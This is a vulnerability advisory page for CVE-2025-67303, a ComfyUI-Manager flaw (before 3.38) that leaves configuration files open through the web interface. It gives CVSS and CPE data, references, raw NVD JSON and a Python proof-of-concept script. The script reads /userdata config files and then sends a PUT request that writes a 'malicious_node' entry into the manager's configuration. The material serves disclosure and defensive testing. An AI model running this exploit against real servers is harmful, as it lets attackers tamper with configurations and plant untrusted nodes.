Security Vulnerability Report
CVE-2025-67303 CVSS 7.5 HIGH

CVE-2025-67303

Published: 2026-01-05 16:15:43
Last Modified: 2026-01-30 01:31:38

Description

An issue in ComfyUI-Manager prior to version 3.38 allowed remote attackers to potentially manipulate its configuration and critical data. This was due to the application storing its files in an insufficiently protected location that was accessible via the web interface.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:comfy:comfyui-manager:*:*:*:*:*:*:*:* - VULNERABLE
ComfyUI-Manager < 3.38

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-67303 PoC - ComfyUI-Manager Path Traversal
# Target: ComfyUI-Manager < v3.38
# This PoC demonstrates accessing config files via web interface
import requests

TARGET_URL = "http://target-server:8181"
COMFYUI_MANAGER_PATH = "/userdata"  # Insecure storage path


def check_vulnerability():
    """Check if target is vulnerable to CVE-2025-67303"""
    # Try to access the manager's config directory
    paths_to_check = [
        f"{COMFYUI_MANAGER_PATH}/config.json",
        f"{COMFYUI_MANAGER_PATH}/manager_config.json",
        f"{COMFYUI_MANAGER_PATH}/custom-node-list.json",
    ]
    vulnerable = False
    for path in paths_to_check:
        try:
            response = requests.get(f"{TARGET_URL}{path}", timeout=10)
            if response.status_code == 200:
                print(f"[+] Found accessible file: {path}")
                print(f"[+] Content preview: {response.text[:200]}...")
                vulnerable = True
        except requests.exceptions.RequestException as e:
            print(f"[-] Error accessing {path}: {e}")
    return vulnerable


def exploit_config_manipulation():
    """Attempt to modify configuration via PUT request"""
    malicious_config = '{"custom_nodes": ["malicious_node"], "enabled": true}'
    try:
        response = requests.put(
            f"{TARGET_URL}{COMFYUI_MANAGER_PATH}/manager_config.json",
            data=malicious_config,
            headers={"Content-Type": "application/json"},
            timeout=10,
        )
        if response.status_code in [200, 201, 204]:
            print("[+] Successfully modified configuration!")
            return True
    except requests.exceptions.RequestException:
        pass
    return False


if __name__ == "__main__":
    print("CVE-2025-67303 PoC - ComfyUI-Manager < v3.38")
    print("=" * 50)
    if check_vulnerability():
        print("\n[!] Target is VULNERABLE to CVE-2025-67303")
        print("[*] Attempting config manipulation...")
        exploit_config_manipulation()
    else:
        print("\n[-] Target appears to be patched or not accessible")
```

References

https://github.com/Comfy-Org/ComfyUI-Manager/blob/main/docs/en/v3.38-userdata-security-migration.md (Exploit, Third Party Advisory)
https://github.com/Comfy-Org/ComfyUI-Manager/pull/2338/commits/e44c5cef58fb4973670b86433b9d24d077b44a26 (Patch)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-67303",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-05T16:15:42.977",
    "lastModified": "2026-01-30T01:31:37.653",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "An issue in ComfyUI-Manager prior to version 3.38 allowed remote attackers to potentially manipulate its configuration and critical data. This was due to the application storing its files in an insufficiently protected location that was accessible via the web interface"
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-420"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:comfy:comfyui-manager:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "3.38",
                "matchCriteriaId": "A2BEDC7B-32BB-4C47-81B5-4EC4357B3E36"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/Comfy-Org/ComfyUI-Manager/blob/main/docs/en/v3.38-userdata-security-migration.md",
        "source": "[email protected]",
        "tags": ["Exploit", "Third Party Advisory"]
      },
      {
        "url": "https://github.com/Comfy-Org/ComfyUI-Manager/pull/2338/commits/e44c5cef58fb4973670b86433b9d24d077b44a26",
        "source": "[email protected]",
        "tags": ["Patch"]
      }
    ]
  }
}
```